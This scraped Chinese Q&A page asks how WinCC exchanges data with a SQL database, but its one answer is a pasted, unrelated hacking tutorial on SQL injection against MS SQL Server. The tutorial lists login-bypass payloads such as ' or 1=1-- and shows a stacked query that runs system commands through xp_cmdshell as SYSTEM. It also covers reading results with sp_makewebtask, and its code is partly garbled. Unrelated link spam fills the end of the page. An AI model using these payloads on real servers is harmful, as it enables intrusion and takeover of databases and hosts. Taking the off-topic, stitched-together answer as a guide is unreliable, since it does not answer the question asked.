问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

wincc与SQL数据库交换数据

发布网友 发布时间:2022-04-24 03:04

我来回答

1个回答

热心网友 时间:2022-04-14 20:02

黑客SQL服务器入侵实战演习(二)

3.1为什么使用的是' or 1=1--呢?

让我们来看看其他例子中使用'or 1=1--的重要性吧。有别于正常的登陆方式,使用这样的登陆方式可能得到正常登陆中不能得到的某些特殊信息。用一个链接中得到的ASP页来打比方:

http://ck/index.asp?category=food

在上面这条URL中,'category'是一个变量名,而'food'是赋予该变量的值。为了做到这些(链接成功),

这个ASP必须包含以下相关的代码(下面也是我们为了演示这个实验所写的代码):

v_cat = request("category)

& v_cat & "'

set rs=conn.execute(sqlstr)

正如我们所看到的,变量值将会预先处理然后赋值于'v_cat',也就是说该SQL语句将会变为:

SELECT * FROM proct WHERE PCategory='food'

这个请求将会返回通过WHERE条件比较后得到的结果,在这个例子中也就是'food'了。现在设想一下如果

我们把该URL改成这样的话:

http://ck/index.asp?category=food' or 1=1--

现在我们的变量v_cat的值就等同于"food' or 1=1--了,现在如果我们要重新代入那条SQL请求的话,

那条SQL请求将会是:

SELECT * FROM proct WHERE PCategory='food' or 1=1--'

现在这个请求将会从proct表中选取每一条信息而并不会去理会PCategory是否等于'food'。至于结尾部分的那两条'--'(破折号)则用于‘告诉’MS SQL SERVER忽略结尾最后的那个'(单引号)。有的时候也可以使用'#'(井号)来代替'--'(双破折号)在这里的用法。

无论如何,如果对方不是一台SQL服务器(这里指的是MS SQL SERVER),或者你不能使用简单的方法去忽略最后的那个单引号的话,你可以尝试:

' or 'a'='a

这样的话整个SQL请求将会变为:

SELECT * FROM proct WHERE PCategory='food' or 'a'='a'

它也会返回相同的结果。

根据实际情况,SQL注入请求是可以有多种动态变化的可能性的:

' or 1=1--

"a

') or ('a'='a
4.0如何在SQL注入请求中加入即时执行命令?

能够进行SQL注入的服务器通常都是一些疏于做系统性配置检查的机器,此时我们可以尝试使用SQL的命令执行请求。默认的MS SQL服务器是运行在SYSTEM用户级别下的,这等同于系统管理员的执行与访问权限。我们可以使用MS SQL SERVER的扩展储存过程(如master..xp_cmdshell等)来执行远程系统的某些命令:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

若失败可以尝试一下使用(双引号)代替'(单引号)。

上面例子中的第二个冒号代表一句SQL请求的结束(也代表了它后面紧跟着一条新SQL命令)。若要检验上面这条PING命令是否成功,你可以在10.10.1.2这台机器上监听ICMP请求包,并确认它是否来自那台SQL服务器就可以了:

#tcpmp icmp

如果你不能从那台SQL服务器中得到PING请求的话,并在SQL请求的返回值中得到错误信息的话,有可能是因为该SQL服务器的管理员*了WEB用户访问这些储存过程了。

5.0如何可以获取到我发的SQL请求的相关返回信息呢?

我们可以使用sp_makewebtask处理过程的相关请求写入URL:

"SELECT * FROM INFORMATION

_SCHEMA.TABLES

但先决条件是目标主机的文件夹“share”属性必须设置为“Everyone”。
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
纯种萨摩和不纯的萨摩的区别 不是纯种萨摩,长大成型后和纯种萨摩外表一样吗 学播音主持和配音哪个更赚钱,各有各的长处 学播音真的能改变声音吗,会让自己的普通话更加标准 学习播音和配音的作用,可以提升自信和气质 普通人学配音有没有用,有兴趣则有用 什么是永诚财产保险股份有限公司 win10电脑升级不了ie11win10怎么升级ie11 电脑硬件保修哪些电脑硬件保修包括什么 电脑固态硬盘质保几年一般的电脑保修时间是多久 如何通过ODBC将WINCC数据写入SQL数据库中 怎么从wincc中写数据到SQL 如何在印象笔记中搜索到别人的共享笔记本 如何用标准的odbc sql接口访问wincc归档数据库文档 用wincc远程访问SQL2000.原来从没有试过 如何从sql数据库读取数据到wincc 第三方软件访问Wincc V7.0 SQL2005的方法有哪些 使用WINCC打开之前编辑的项目,提示无法将数据库连接到SQL服务器。 最后提示-log.ldf可能不正确! 第三方软件访问Wincc数据库 WINCC如何访问本地SQL2000 wincc如何访问读取SQL数据库的数据 如何用SQL语言从wincc数据库获取数据,实时获取与获取保存的数据有什么区别? 如何用WINCC访问本地SQL2000 如何让wincc远程访问sql2000 用WINCC的C脚本如何访问远程SQL服务器上的数据库? 酸甜爽口脆萝卜的比例 酸甜爽口脆萝卜的做法红色的 怎样做出酸甜爽口的清脆萝卜? 做法,爽口脆萝卜怎么做好吃,爽口脆萝卜的家常做法 酸甜爽口的脆萝卜,看的让人眼馋,怎么做才好吃 如何高效使用和整理印象笔记? 怎么查看wincc在SQL中的数据 windows10 全局搜索功能无法搜索到onenote里的笔记,是否是BUG WinCC新建项目,关闭后打不开,提示“SQL服务器不能连接数据库,请检查连接权限” 如何利用ODBC访问WINCC的历史数据库 如何用VB访问Wincc数据库 怎样从数据库中访问wincc的变量 怎么找回苹果笔记电脑浏览器上的搜索 期房可以买吗?有什么注意的? 期房能买吗? 期房敢买不 期房能买吗?买期房要注意什么?现在现房多还是期房多? 大家觉得期房可以购买吗? 期房到底能不能买没交房的期房要如何买呢 期房能买吗 期房是什么意思,可以买吗! 为什么很多人敢买期房 期房靠谱吗,可以买吗 正在盖的期房能够买吗 不知道这三大风险还敢买期房?